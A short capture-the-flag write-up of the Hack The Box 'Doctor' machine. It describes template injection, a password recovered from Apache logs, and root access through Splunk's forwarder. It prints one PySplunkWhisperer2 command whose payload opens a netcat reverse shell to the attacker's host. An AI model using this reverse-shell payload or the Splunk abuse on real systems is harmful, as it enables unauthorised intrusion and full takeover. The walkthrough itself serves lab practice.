Doctor- Hack The Box
Introduction
Doctor is an easy Linux HackTheBox level machine. In the user part, we will see the SSTI injection. We have to look at some log files to obtain the password. In the root part, we will exploit Splunk.
Enumeration
In the nmap we have found 3 open ports 22,80,8089.
Visiting port 80 shows that the new domain is doctors.htb.
We have added the doctors.htb in the/etc/hosts file.
Here we can see the login page.
We have created the account to log in.
Exploit the SSTI
We can create a new post.
We tried a small SSTI code to check whether the application is vulnerable or not.
In the source code, we can see that there is a directory called Archive.
We check the archive directory and we can see our SSTI injection worked perfectly.
Now it's time to gain a reverse shell. We used one linear reverse shell script.
We have got a reverse shell.
Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
Finding Password in Logs
After enumerating files and logs, we managed to find something interesting. In /var/log/apache2/backup
, a reset password post request was made and ‘Guitar123’ was seen on the email parameter
Switch to Shaun's user and got the user flag.
Privilege Escalation
Run linpeas.sh reveals splunkforwarder
in /opt
directory. Splunk is running as a root on 8089 port.
#Command
$ python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.59 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.59 443 >/tmp/f'
Reference: https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
We got a root reverse shell.
Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842